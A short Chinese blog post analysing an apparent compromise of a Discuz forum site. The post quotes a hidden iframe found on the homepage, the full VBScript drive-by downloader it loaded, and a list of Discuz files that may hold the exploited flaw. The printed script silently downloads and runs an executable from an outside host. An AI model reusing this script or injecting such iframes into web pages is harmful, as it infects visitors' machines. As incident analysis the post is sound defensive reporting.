ps:在neeao和CN.Tink那里都看到了这个消息,我综合一下。估计是因为前两天DZ出的新洞被拿的,是一个叫freediscuz的论坛公布的漏洞,不过没有公布详细信息,只给了补丁。
看了下首页,有这么句,
<iframe src=http://www.lynndent.com/cf/style.htm width=0 height=0></iframe>
然后打开了这个地址..
代码包含
<script language="VBScript">
on error resume next
my = "http://www.lynndent.com/cf/kkk.exe"
Set CAOc = document.createElement("object")
CAOc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
CAOi="Microsoft.XMLHTTP"
Set CAOd = CAOc.CreateObject(CAOi,"")
sf="Adodb."
sg=""
sh="S"
si="tream"
nihao= "lalalalala8888888"
chuanshuozhongdejingling= "哈哈"
haha="nihao"
CAOf=sf&sg&sh&si
CAOg=CAOf
set CAOa = CAOc.createobject(CAOg,"")
CAOa.type = 1
CAOh="GET"
CAOd.Open CAOh, my, False
CAOd.Send
CAO9="internat.exe"
set CAOb = CAOc.createobject("Scripting.FileSystemObject","")
set CAOe = CAOb.GetSpecialFolder(2)
CAOa.open
CAO9= CAOb.BuildPath(CAOe,CAO9)
CAOa.write CAOd.responseBody
CAOa.savetofile CAO9,2
CAOa.close
set CAOe = CAOc.createobject("Shell.Application","")
CAOe.ShellExecute CAO9,BBS,BBS,"open",0
</script>[/quote]
漏洞可能所在文件:
/upload/include/chinese.class.php
/upload/include/common.inc.php
/upload/include/db_mysql.class.php
/upload/include/db_mysql_error.inc.php
/upload/include/global.func.php
/upload/include/newreply.inc.php
/upload/include/post.func.php
/upload/search.php
/seccode.php
/viewthread.php
/discuz_version.php
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论